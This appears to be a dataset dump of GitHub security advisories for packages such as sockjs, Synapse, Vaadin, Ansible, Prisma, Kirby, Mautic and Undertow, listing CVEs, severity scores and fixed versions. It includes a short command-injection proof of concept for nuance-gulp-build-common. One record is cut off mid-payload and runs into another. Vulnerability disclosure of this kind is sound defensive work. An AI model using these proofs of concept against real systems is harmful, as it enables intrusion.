'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sockjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8823'}, {'type': 'WEB', 'url': 'https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/theyiyibest/Reflected-XSS-on-SockJS'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SOCKJS-548397'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/sockjs'}, {'type': 'WEB', 'url': 'https://www.sockjs.org'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:51:28Z', 'nvd_published_at': '2020-02-10T03:15:00Z'}" +1.4.0,GHSA-5wrh-4jwv-5w78,2021-08-31T21:07:35Z,2021-04-13T15:13:08Z,,['CVE-2021-21392'],Open redirect via transitional IPv6 addresses on dual-stack networks,"### Impact +Requests to user provided domains were not restricted to external IP addresses when transitional IPv6 addresses were used. Outbound requests to federation, identity servers, when calculating the key validity for third-party invite events, sending push notifications, and generating URL previews are affected. This could cause Synapse to make requests to internal infrastructure on dual-stack networks. + +### Patches +This issue is fixed by #9240. + +### Workarounds +Outbound requests to the following address ranges can be blocked by a firewall, if unused for internal communication between systems: + +* `::ffff/80` +* `::0000/80` (note that this IP range is considered deprecated by the IETF) +* `2002::/16` (note that this IP range is considered deprecated by the IETF) + +### References +* [RFC3056](https://tools.ietf.org/html/rfc3056) +* [RFC4291](https://tools.ietf.org/html/rfc4291)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.28.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-5wrh-4jwv-5w78'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21392'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9240'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-synapse/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T21:51:49Z', 'nvd_published_at': '2021-04-12T22:15:00Z'}" +1.4.0,GHSA-rp4x-wxqv-cf9m,2021-04-16T23:17:25Z,2021-04-19T14:52:29Z,,['CVE-2019-25027'],Reflected cross-site scripting in default RouteNotFoundError view in Vaadin 10 and 11-13,"Missing output sanitization in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.10 (Vaadin 10.0.0 through 10.0.13), and 1.1.0 through 1.4.2 (Vaadin 11.0.0 through 13.0.5) allows attacker to execute malicious JavaScript via crafted URL. + +- https://vaadin.com/security/cve-2019-25027","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-rp4x-wxqv-cf9m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25027'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/5498'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2019-25027'}]","{'cwe_ids': ['CWE-79', 'CWE-81'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:17:25Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}" +1.4.0,GHSA-g4cp-h53p-v3v8,2022-02-11T21:12:32Z,2021-04-30T17:28:42Z,,['CVE-2020-10705'],Allocation of Resources Without Limits or Throttling in Undertow,"A flaw was discovered in Undertow in versions before Undertow 2.1.1.Final where certain requests to the ""Expect: 100-continue"" header may cause an out of memory error. This flaw may potentially lead to a denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.0.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10705'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1803241'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0014/'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T16:36:15Z', 'nvd_published_at': '2020-06-10T20:15:00Z'}" +1.4.0,GHSA-gfr2-qpxh-qj9m,2022-05-05T21:55:25Z,2021-04-07T20:35:24Z,,['CVE-2020-1735'],Path Traversal in Ansible,"A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, and then choose a new destination path on the controller node. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1735'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67793'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1735'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/blob/stable-2.9/changelogs/CHANGELOG-v2.9.rst#security-fixes-7'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T17:54:51Z', 'nvd_published_at': '2020-03-16T16:15:00Z'}" +1.4.0,GHSA-pxcc-hj8w-fmm7,2021-03-31T18:00:32Z,2021-04-06T17:25:12Z,,['CVE-2021-21414'],Command injection vulnerability in @prisma/sdk in getPackedPackage function,"### Impact + +As of today, we are not aware of any Prisma users or external consumers of the `@prisma/sdk` package who are affected by this security vulnerability. + +This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. + +It only affects the `getPackedPackage` function and this function is not advertised and only used for tests & building our CLI, no malicious code was found after checking our codebase. + +### Patches + +Fixed in +- @prisma/sdk@2.20.0 (latest channel) +- @prisma/sdk@2.20.0-dev.29 (dev channel) + +Pull Request closing this vulnerability [https://github.com/prisma/prisma/pull/6245](https://github.com/prisma/prisma/pull/6245) + +### Acknowledgements + +This issue was discovered and reported by GitHub Engineer [@erik-krogh (Erik Krogh Kristensen)](https://github.com/erik-krogh). + +### For more information + +If you have any questions or comments about this advisory: + +- Create a discussion in [the Prisma repository](https://github.com/prisma/prisma/discussions) +- Email us at security@prisma.io","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@prisma/sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.20.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/prisma/prisma/security/advisories/GHSA-pxcc-hj8w-fmm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21414'}, {'type': 'WEB', 'url': 'https://github.com/prisma/prisma/pull/6245'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210618-0003/'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T18:00:32Z', 'nvd_published_at': '2021-04-29T01:15:00Z'}" +1.4.0,GHSA-wmg4-8cp2-hpg9,2022-08-11T13:18:23Z,2021-04-19T14:54:04Z,,['CVE-2021-29430'],Sydent vulnerable to denial of service attack via memory exhaustion,"### Impact + +Sydent does not limit the size of requests it receives from HTTP clients. A malicious user could send an HTTP request with a very large body, leading to disk space exhaustion and denial of service. + +Sydent also does not limit response size for requests it makes to remote Matrix homeservers. A malicious homeserver could return a very large response, again leading to memory exhaustion and denial of service. + +This affects any server which accepts registration requests from untrusted clients. + +### Patches + +Patched by 89071a1, 0523511, f56eee3. + +### Workarounds + +Request sizes can be limited in an HTTP reverse-proxy. + +There are no known workarounds for the problem with overlarge responses. + +### For more information + +If you have any questions or comments about this advisory, email us at security@matrix.org.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-sydent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/security/advisories/GHSA-wmg4-8cp2-hpg9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29430'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/0523511d2fb40f2738f8a8549868f44b96e5dab7'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/89071a1a754c69a50deac89e6bb74002d4cda19d'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/f56eee315b6c44fdd9f6aa785cc2ec744a594428'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/releases/tag/v2.3.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-sydent/'}]","{'cwe_ids': ['CWE-20', 'CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-15T20:49:34Z', 'nvd_published_at': '2021-04-15T21:15:00Z'}" +1.4.0,GHSA-qgp4-5qx6-548g,2021-04-27T20:11:58Z,2021-04-30T17:30:06Z,,['CVE-2021-29460'],Cross-site scripting (XSS) from unsanitized uploaded SVG files in Kirby,"### Impact + +An editor with write access to the Kirby Panel can upload an SVG or XML file that contains harmful content like `` +2. Visit any landing page and open the JS dev console. You will see the following message with real instance db password: `db password is: ` + +Risk rating: ModerateCVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L + +### Patches +Upgrade to 3.3.2 + +### Workarounds +No + +### References +No + +### For more information +If you have any questions or comments about this advisory: + +* Email us at [security@mautic.org](mailto:security@mautic.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'mautic/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mautic/mautic/security/advisories/GHSA-4hjq-422q-4vpx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27908'}, {'type': 'PACKAGE', 'url': 'https://github.com/mautic/mautic'}]","{'cwe_ids': ['CWE-732', 'CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T16:38:12Z', 'nvd_published_at': '2021-03-23T20:15:00Z'}" +1.4.0,GHSA-23c7-6444-399m,2022-10-25T20:51:03Z,2021-04-09T15:42:40Z,,['CVE-2021-21431'],Improper Input Validation in sopel-plugins.channelmgnt,"### Impact +On some IRC servers, restrictions around the removal of the bot using the kick/kickban command could be bypassed when kicking multiple users at once. +We also believe it may have been possible to remove users from other channels but due to the wonder that is IRC and following RfCs, We have no POC for that. + +Freenode is not affected. + +### Patches +Upgrade to 2.0.1 or higher + +### Workarounds +Do not use this plugin on networks where TARGMAX > 1. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue on [phab](https://phab.mirahezebots.org/maniphest/task/edit/form/1/). +* Email us at [staff(at)mirahezebots(dot)org](mailto:staff@mirahezebots.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sopel-plugins.channelmgnt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt/security/advisories/GHSA-23c7-6444-399m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21431'}, {'type': 'WEB', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt/commit/643388365f28c5cc682254ab913c401f0e53260a'}, {'type': 'WEB', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt/commit/7c96d400358221e59135f0a0be0744f3fad73856'}, {'type': 'PACKAGE', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt'}, {'type': 'WEB', 'url': 'https://pypi.org/project/sopel-plugins.channelmgnt/'}]","{'cwe_ids': ['CWE-20', 'CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T15:42:18Z', 'nvd_published_at': '2021-04-09T16:15:00Z'}" +1.4.0,GHSA-244r-fcj3-ghjq,2022-04-22T15:49:36Z,2021-04-07T21:51:33Z,,['CVE-2021-20289'],Exposure of class information in RESTEasy,A flaw was found in RESTEasy in all current versions of RESTEasy up to 4.6.0.Final. The endpoint class and method names are returned as part of the exception response when RESTEasy cannot convert one of the request URI path or query values to the matching JAX-RS resource method's parameter value. The highest threat from this vulnerability is to data confidentiality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '4.6.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20289'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1935927'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1941544'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/RESTEASY-2843'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0008/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-209', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T22:37:48Z', 'nvd_published_at': '2021-03-26T17:15:00Z'}" +1.4.0,GHSA-27fj-mc8w-j9wg,2023-09-11T18:42:06Z,2021-04-16T19:52:35Z,,['CVE-2021-30246'],RSA signature validation vulnerability on maleable encoded message in jsrsasign,"### Impact +Vulnerable jsrsasign will accept RSA signature with improper PKCS#1.5 padding. +Decoded RSA signature value consists following form: +`01(ff...(8 or more ffs)...ff)00[ASN.1 OF DigestInfo]` +Its byte length must be the same as RSA key length, however such checking was not sufficient. + +To make crafted message for practical attack is very hard. + +### Patches +Users validating RSA signature should upgrade to 10.2.0 or later. + +### Workarounds +There is no workaround. Not to use RSA signature validation in jsrsasign. + +### ACKNOWLEDGEMENT +Thanks to Daniel Yahyazadeh @yahyazadeh for reporting and analyzing this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsrsasign'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kjur/jsrsasign/security/advisories/GHSA-27fj-mc8w-j9wg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30246'}, {'type': 'WEB', 'url': 'https://github.com/kjur/jsrsasign/issues/478'}, {'type': 'WEB', 'url': 'https://github.com/kjur/jsrsasign/releases/tag/10.1.13'}, {'type': 'WEB', 'url': 'https://kjur.github.io/jsrsasign/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T17:30:34Z', 'nvd_published_at': '2021-04-07T21:15:00Z'}" +1.4.0,GHSA-8695-fr6h-9fq8,2023-09-11T16:28:40Z,2021-04-13T15:19:23Z,2021-08-30T23:13:49Z,['CVE-2020-28430'],Command Injection in nuance-gulp-build-common,"All versions of package nuance-gulp-build-common are vulnerable to Command Injection via the index.js file. + +**PoC:** +```js +var a = require(""nuance-gulp-build-common"") +a.run(""touch JHU"") +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nuance-gulp-build-common'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28430'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NUANCEGULPBUILDCOMMON-1050419'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-25T23:50:03Z', 'nvd_published_at': '2021-02-23T16:15:00Z'}" +1.4.0,GHSA-9q69-g5gc-9fgf,2021-04-20T17:07:06Z,2021-04-22T16:16:18Z,,['CVE-2020-35217'],Cross-Site Request Forgery in Vert.x-Web framework,"Vert.x-Web framework v4.0 milestone 1-4 does not perform a correct CSRF verification. Instead of comparing the CSRF token in the request with the CSRF token in the cookie, it compares the CSRF token in the cookie against a CSRF token that is stored in the session. An attacker does not even need to provide a CSRF token in the request because the framework does not consider it. The cookies are automatically sent by the browser and the verification will always succeed, leading to a successful CSRF attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-milestone1'}, {'fixed': '4.0.0-milestone5'}]}], 'versions': ['4.0.0-milestone1']}, {'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-milestone2'}, {'fixed': '4.0.0-milestone5'}]}], 'versions': ['4.0.0-milestone2']}, {'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-milestone3'}, {'fixed': '4.0.0-milestone5'}]}], 'versions': ['4.0.0-milestone3']}, {'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-milestone4'}, {'fixed': '4.0.0-milestone5'}]}], 'versions': ['4.0.0-milestone4']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35217'}, {'type': 'WEB', 'url': 'https://github.com/vert-x3/vertx-web/pull/1613'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T17:07:06Z', 'nvd_published_at': '2021-01-20T13:15:00Z'}" +1.4.0,GHSA-72m5-fvvv-55m6,2021-04-20T16:59:30Z,2021-04-22T16:16:49Z,,['CVE-2020-26939'],Observable Differences in Behavior to Error Inputs in Bouncy Castle,"In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk14'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.61'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.61'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk16'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.61'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bc-fips'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26939'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/commit/930f8b274c4f1f3a46e68b5441f1e7fadb57e8c1'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/wiki/CVE-2020-26939'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00007.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20201202-0005/'}]","{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T16:59:30Z', 'nvd_published_at': '2020-11-02T22:15:00Z'}" +1.4.0,GHSA-p9w3-gwc2-cr49,2022-02-11T21:12:07Z,2021-04-30T17:28:52Z,,['CVE-2020-10687'],HTTP Request Smuggling in Undertow,"A flaw was discovered in all versions of Undertow before Undertow 2.2.0.Final, where HTTP request smuggling related to CVE-2017-2666 is possible against HTTP/1.x and HTTP/2 due to permitting invalid characters in an HTTP request. This flaw allows an attacker to poison a web-cache, perform an XSS attack, or obtain sensitive information from request other than their own.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.0.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10687'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1785049'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6603513ea8afbf6857fd77ca5888ec8385d0af493baa4250e28c351c@%3Cdev.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0015/'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T16:14:25Z', 'nvd_published_at': '2020-09-23T13:15:00Z'}" +1.4.0,GHSA-923p-fr2c-g5m2,2021-08-31T21:10:29Z,2021-04-07T20:30:44Z,,['CVE-2020-1739'],Exposure of Sensitive Information to an Unauthorized Actor in Ansible,"A flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument ""password"" of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.5'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.8'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.17'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.16'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1739'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67797'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1739'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FWDK3QUVBULS3Q3PQTGEKUQYPSNOU5M3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QT27K5ZRGDPCH7GT3DRI3LO4IVDVQUB7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3IMV3XEIUXL6S4KPLYYM4TVJQ2VNEP2/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T18:45:25Z', 'nvd_published_at': '2020-03-12T18:15:00Z'}" +1.4.0,GHSA-7h8x-wmq2-7mff,2022-07-05T18:01:16Z,2021-04-13T15:20:20Z,,['CVE-2021-23330'],Command injection in launchpad,All versions of package launchpad are vulnerable to Command Injection via stop.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'launchpad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23330'}, {'type': 'WEB', 'url': 'https://github.com/bitovi/launchpad/issues/123%23issuecomment-732188118'}, {'type': 'WEB', 'url': 'https://github.com/bitovi/launchpad/pull/124'}, {'type': 'PACKAGE', 'url': 'https://github.com/bitovi/launchpad'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LAUNCHPAD-1044065'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:56:57Z', 'nvd_published_at': '2021-02-01T15:15:00Z'}" 